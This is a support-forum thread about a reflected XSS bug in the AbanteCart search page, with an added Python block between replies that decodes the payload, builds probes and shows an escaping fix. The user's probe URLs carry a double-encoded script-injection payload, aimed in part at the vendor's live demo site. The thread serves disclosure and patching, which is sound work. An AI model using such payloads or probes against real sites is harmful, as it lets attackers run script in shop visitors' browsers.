Topic: XSS Vulnerability (Read 14997 times)
Mahomed Dawood (Jr. Member)
XSS Vulnerability
« on: December 09, 2021, 05:15:44 AM »
Hi guys,
I recently ran a security check on my website and came across a reflected XSS vulnerability on the product page.
Is this something that AbanteCart is planning on fixing? Or could this just be a misconfiguration on my side?
Basara (Administrator)
Re: XSS Vulnerability
« Reply #1 on: December 09, 2021, 05:35:06 AM »
Hello.
Can you please tell us more about your findings?
Please rate your AbanteCart experience or leave your review
Mahomed Dawood (Jr. Member)
Re: XSS Vulnerability
« Reply #2 on: December 09, 2021, 05:58:38 AM »
Hi,
So if I call my website
http://mywebsite/uri?keyword=10mm&category_id=%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e
a pop-up appears with JavaScript.
Please see attached.
Basara (Administrator)
Re: XSS Vulnerability
« Reply #3 on: December 09, 2021, 07:18:33 AM »
Hello.
What is your AbanteCart version?
I do not see the problem on the AbanteCart demo:
https://demo.abantecart.com/uri?keyword=10mm&category_id=%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e
Mahomed Dawood (Jr. Member)
Re: XSS Vulnerability
« Reply #4 on: December 09, 2021, 08:37:46 AM »
Hi,
It seems to originate from the search bar.
Try this:
https://demo.abantecart.com/index.php?rt=product/search&keyword=shoe&category_id=%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e
Mahomed Dawood (Jr. Member)
Re: XSS Vulnerability
« Reply #5 on: December 09, 2021, 08:48:25 AM »
I have AbanteCart v1.3.1.
Basara (Administrator)
Re: XSS Vulnerability
« Reply #6 on: December 10, 2021, 12:07:23 AM »
Hello.
Thank you for reporting. We will provide the fix shortly.
Please follow the issue in the bug tracker:
https://github.com/abantecart/abantecart-src/issues/1513
« Last Edit: December 10, 2021, 06:25:50 AM by Basara »
Mahomed Dawood (Jr. Member)
Re: XSS Vulnerability
« Reply #7 on: December 10, 2021, 12:17:47 AM »
Thank you
Basara (Administrator)
Re: XSS Vulnerability
« Reply #8 on: December 14, 2021, 06:28:24 AM »
Hello.
You can try to apply the fix on your site.
See the commit in
https://github.com/abantecart/abantecart-src/issues/1513
Mahomed Dawood (Jr. Member)
Re: XSS Vulnerability
« Reply #9 on: December 15, 2021, 04:28:59 AM »
Hi,
Works like a charm.
Thank you for your assistance.
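The probe URLs in replies #2 and #4 carry a double-percent-encoded payload (`%2522%253e...`), and the fix in reply #8 is only referenced through the GitHub issue. The script below is an added example, not code from the thread or from AbanteCart: it peels the payload's encoding layers, builds the same kind of probe from a clean marker, and classifies a response body as reflecting the marker unescaped, HTML-escaped, or not at all. The `render_vulnerable` and `render_fixed` functions, the hidden-input template they emit and the `shop.example` host are constructed assumptions that model an unescaped reflection and the same output with HTML escaping; they are not taken from AbanteCart's source.

```python
"""Reflected-XSS probe helpers for a query parameter such as category_id.

Added example, not AbanteCart code. The two render_* functions are a constructed
model of a template that writes a query value back into HTML, one unescaped and
one HTML-escaped; they are not taken from AbanteCart's source.
"""
import html
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Payload quoted in the thread, and the markup it decodes to.
PAYLOAD = "%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e"
MARKER = '"><script>alert(987654321)</script>'


def decode_layers(value):
    """Return successive percent-decodings of value until it stops changing."""
    layers = [value]
    while True:
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            return layers
        layers.append(nxt)


def build_probe(base_url, param, marker, layers=2):
    """Append param=<marker percent-encoded `layers` times> to a GET URL."""
    value = marker
    for _ in range(layers):
        value = quote(value, safe="")
    sep = "&" if "?" in base_url else "?"
    return f"{base_url}{sep}{param}={value}"


def classify_reflection(body, marker):
    """'unescaped' if marker is reflected verbatim (usable as markup),
    'escaped' if it appears only entity-encoded, 'absent' otherwise."""
    if marker in body:
        return "unescaped"
    if html.escape(marker, quote=True) in body:
        return "escaped"
    return "absent"


def _category_id(url):
    """parse_qs decodes one layer (as PHP's $_GET would); the second unquote
    models an application that decodes the value again before output."""
    qs = parse_qs(urlsplit(url).query)
    return unquote(qs.get("category_id", [""])[0])


def render_vulnerable(url):
    """Constructed model: value written into an attribute with no escaping."""
    return f'<input type="hidden" name="category_id" value="{_category_id(url)}">'


def render_fixed(url):
    """Constructed model of the fix: same value, HTML-escaped before output."""
    safe = html.escape(_category_id(url), quote=True)
    return f'<input type="hidden" name="category_id" value="{safe}">'


if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(PAYLOAD)):
        print(f"decode x{depth}: {layer}")
    # Constructed host; the path and keyword mirror the thread's search URL.
    url = build_probe("https://shop.example/index.php?rt=product/search&keyword=shoe",
                      "category_id", MARKER)
    print(url)
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(f"{name}: {classify_reflection(render(url), MARKER)}")
```

To check a real installation, fetch the URL returned by `build_probe` with a unique canary instead of the `alert` marker and pass the response body to `classify_reflection`; only `unescaped` indicates the bug, while `escaped` or `absent` is what a patched site should return. Note that the thread's payload needs two decodes before it becomes markup, so a single `$_GET` read alone yields `%22%3e...`; a pop-up can only fire if the application decodes the value a second time before writing it out, which is an inference from the payload, not a statement about AbanteCart's internals. Since `category_id` is meant to be numeric, casting it to an integer before use is a stricter defence than escaping alone.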
garyfartsalot (Newbie)
Re: XSS Vulnerability
« Reply #10 on: January 13, 2023, 05:10:46 AM »
Hi Mahomed Dawood,
How did you fix it?
Did you update AbanteCart to the latest fixed version, or did you apply a fix?
llegrand (Hero Member)
Re: XSS Vulnerability
« Reply #11 on: January 13, 2023, 06:05:14 PM »
What cart version are you currently using?
We have posted the patch file for AbanteCart v1.3.2 along with instructions.
You can get it here:
https://why2central.net/patch/abantecart-v1-3-2-default-core-xss-vulnerability-patch-file/
If you are using v1.3.3, the corrected files are already in that code.